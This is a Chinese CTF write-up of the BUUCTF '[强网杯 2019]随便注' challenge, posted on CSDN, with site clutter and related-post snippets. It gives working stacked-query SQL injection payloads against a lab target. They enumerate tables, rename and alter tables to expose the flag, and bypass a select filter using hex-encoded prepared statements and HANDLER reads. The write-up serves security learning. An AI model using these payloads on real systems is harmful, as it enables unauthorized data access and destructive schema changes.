[强网杯 2019]随便注

最新推荐文章于 2024-07-15 19:44:21 发布
最新推荐文章于 2024-07-15 19:44:21 发布
阅读量1.6k 收藏 3
点赞数 2
分类专栏: 每日一题 文章标签: CTF mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44033675/article/details/121432182
版权

文章目录

环境

[强网杯 2019]随便注 BUUCTF启动靶机,获取链接
http://2849c7a6-b1b9-417c-8c48-ada29998e57d.node4.buuoj.cn:81/?inject=1

解题思路

访问链接,看到一个输入框。
在这里插入图片描述
输入1输出

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}

输入2输出

array(2) {
  [0]=>
  string(1) "2"
  [1]=>
  string(12) "miaomiaomiao"
}

输入3没有回显。
加上单引号看看1',发现报错。
在这里插入图片描述
闭合单引号1'#发现正常输出,可以判定存在字符型注入。
在这里插入图片描述
接下来就是判断存在多少字段,以及回显的字段。
-1' union select 1,2,3,4#发现有过滤且过滤的还挺多的,至少select不能用了。
在这里插入图片描述
尝试内联注释符绕过/*!50001select*/,但还是依旧失败。
试试堆叠注入,1';show databases;#发现注入成功,爆出了数据库。
在这里插入图片描述
接着爆当前数据库的表,1';show tables ;#
在这里插入图片描述
爆字段1';show columns from words;#,发现存在id和data两个字段,而我们之前正常输出时也是两个字段,而且第一个字段也比较像是id值,猜想输出的是words表中的。
在这里插入图片描述
接着爆下"1919810931114514"表的字段,注意当表名是数字字符串时要用反引号包裹:1';show columns from `1919810931114514`;#,发现flag字段。
在这里插入图片描述
但是我们不能直接读出表中的值,这时候就要联想到正常输出的值了;之前我们猜想输出的是words表中的,现在我们要做的就是把"1919810931114514"表改成words表,这样就能输出flag了。
1、首先把words表改成其他名。

rename table words to a;

2、"1919810931114514"改为words。

rename table `1919810931114514` to words;

3、将flag段改成data段。

alter table words change flag data varchar(50);

4、但是还少id段,添加id段。

alter table words add id int unsigned not Null auto_increment primary key;

连在一起构成payload。

1';rename table words to a;rename table `1919810931114514` to words;alter table words change flag data varchar(50);alter table words add id int unsigned not Null auto_increment primary key;

在这里插入图片描述
在重新访问刷新,证明我们的猜想没有错,输出的就是words表中的值。
在这里插入图片描述

其他姿势1

通过查看其他大佬的wp,发现还有其他的payload。

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

通过预编译来绕过select过滤,学到了学到了。
1、prepare…from…是预处理语句,会进行编码转换。
2、execute用来执行由SQLPrepare创建的SQL语句。
3、SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。

其他姿势2

1'; handler `1919810931114514` open as `a`; handler `a` read next;#

菜鸟表示没听过handler,这是啥玩意?得学啊
官方介绍https://dev.mysql.com/doc/refman/8.0/en/handler.html
handler是指一行一行的读取表中数据可以看出是弱化版的select。
这个payloa的意思就是打开1919810931114514表将a做为他的句柄可以看成是别名,然后读取表中的下一行数据。
这样就可以绕过select了。

总结

要学的还有很多,努力学习吧少年;SQL语法还是有很多不知道的,通过这题学到很多。

参考

https://blog.csdn.net/qq_44657899/article/details/103239145

1ance.
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[安洵杯 2019]easy_web
qq_40327508的博客
05-30 611
[安洵杯 2019]easy_web 考点:MD5强类型绕过,命令入绕过 进入发现img参数可能有任意文件下载 通过2次base64解密和一次hex转字符串 得到555.png 再通过相同的方式获取到了index.php的源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img'])
[强网杯 2019]随便1
weixin_41571993的博客
09-25 468
靶场练习
[GYCTF2020]Blacklist(堆叠入)
记录学习,一起进步
01-19 1987
[GYCTF2020]Blacklist(堆叠入)
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3964
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
SQL入小结
jojohacker的博客
09-27 360
SQL入小结 01——数字型 http://localhost:32774/sqli/01.php?id=1’ 发现有报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1 猜测语句 WHERE id=$id LIMIT 0,1 验证一下 爆
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1077
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1360
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
CTF日记】BUUOJ篇
CH3UHX9
03-11 610
[HCTF 2018]WarmUp 题目介绍 这道题来自BUUCTF,传送门。 涉及的知识点包括: PHP代码审计 远程文件包含 题目代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
BUUCTF-WEB(1-16)
菜鸡程序员的博客
01-26 1679
BUUCTF-WEB(1-16) 1.[HCTF 2018]WarmUp ​ 根据点开靶机时的一个提示:代码审计,可知主要考察代码审计,在点开靶机之后,出现了一个滑稽表情,右键检查网页源码,发现在图片的上方有个释 ,<!--source.php-->感觉像是个有用的信息,于是在网页的链接后边加上/source.php页面上出现了代码 <?php highlight_file(__FILE__); class emmm { public stati
array(1) { [0]=> int(5) }和array(1) { [0]=> string(1) "5" }
weixin_30851409的博客
03-28 830
php array数组: $arrayValue = array(5); $arrayValue = array('5'); 的不同之处 一个是整型一个是字符串型 array(1) { [0]=> int(5) } array(1) { [0]=> string(1) "5" } 表示:数组下标为0的元素是字符串,长度为1,值是5 转载于:https://www.cnbl...
记录些MySQL题集(3)
最新发布
安静的软件工程师
07-15 689
记录些MySQL题集(3)
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值